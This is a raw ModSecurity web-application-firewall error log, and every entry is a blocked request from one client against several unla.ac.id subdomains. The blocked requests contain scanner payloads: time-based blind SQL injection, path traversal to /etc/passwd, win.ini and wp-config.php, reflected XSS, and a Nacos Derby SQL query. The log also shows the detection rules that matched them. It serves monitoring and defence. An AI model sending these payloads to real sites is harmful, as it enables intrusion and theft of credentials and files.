[Tue Aug 29 11:41:35.463889 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAcbSJsAAAAv"]
[Tue Aug 29 11:41:35.516599 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAcbSJwAAAAv"]
[Tue Aug 29 11:41:35.536030 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAQkBgMAAAAC"]
[Tue Aug 29 11:41:35.559592 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAUKhJwAAABC"]
[Tue Aug 29 11:41:35.559779 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAc8A1QAAAAK"]
[Tue Aug 29 11:41:36.374834 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcbSJ8AAAAv"]
[Tue Aug 29 11:41:36.374841 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAc8A1gAAAAK"]
[Tue Aug 29 11:41:36.376334 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcoNZ4AAAAF"]
[Tue Aug 29 11:41:36.378624 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAXHqDEAAAAT"]
[Tue Aug 29 11:41:36.428074 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc0NjMAAAAM"]
[Tue Aug 29 11:41:36.468513 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAcbSKIAAAAv"]
[Tue Aug 29 11:41:36.512457 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAXHqDUAAAAT"]
[Tue Aug 29 11:41:36.555457 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc8A10AAAAK"]
[Tue Aug 29 11:41:36.556267 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcbSKQAAAAv"]
[Tue Aug 29 11:41:36.557514 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc0NjYAAAAM"]
[Tue Aug 29 11:41:36.623873 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO13AMCo-f0AAAc0NjkAAAAM"]
[Tue Aug 29 11:41:37.388072 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AcCo-f0AAAUKhKEAAABC"]
[Tue Aug 29 11:41:37.393074 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AcCo-f0AAAcqJQ8AAAAG"]
[Tue Aug 29 11:41:38.389445 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAc0NkIAAAAM"]
[Tue Aug 29 11:41:38.391576 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAc8A2gAAAAK"]
[Tue Aug 29 11:41:38.404317 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAXHqD4AAAAT"]
[Tue Aug 29 11:41:38.411362 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAaZ9vwAAAAo"]
[Tue Aug 29 11:41:39.375873 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAc0NkUAAAAM"]
[Tue Aug 29 11:41:39.388074 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAc8A2wAAAAK"]
[Tue Aug 29 11:41:39.395953 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAcbSLQAAAAv"]
[Tue Aug 29 11:41:39.413105 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAcqJRMAAAAG"]
[Tue Aug 29 11:41:39.436187 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13A8Co-f0AAAcoNbMAAAAF"]
[Tue Aug 29 11:41:39.501361 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAQSWsAAAAA0"]
[Tue Aug 29 11:41:39.507035 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13A8Co-f0AAAaZ9wMAAAAo"]
[Tue Aug 29 11:41:40.440960 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13BMCo-f0AAAQSWsMAAAA0"]
[Tue Aug 29 11:41:40.447010 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcqJRYAAAAG"]
[Tue Aug 29 11:41:40.489536 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcqJRcAAAAG"]
[Tue Aug 29 11:41:40.512720 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAUKhK8AAABC"]
[Tue Aug 29 11:41:40.515138 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcqJRgAAAAG"]
[Tue Aug 29 11:41:40.528112 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcoNbkAAAAF"]
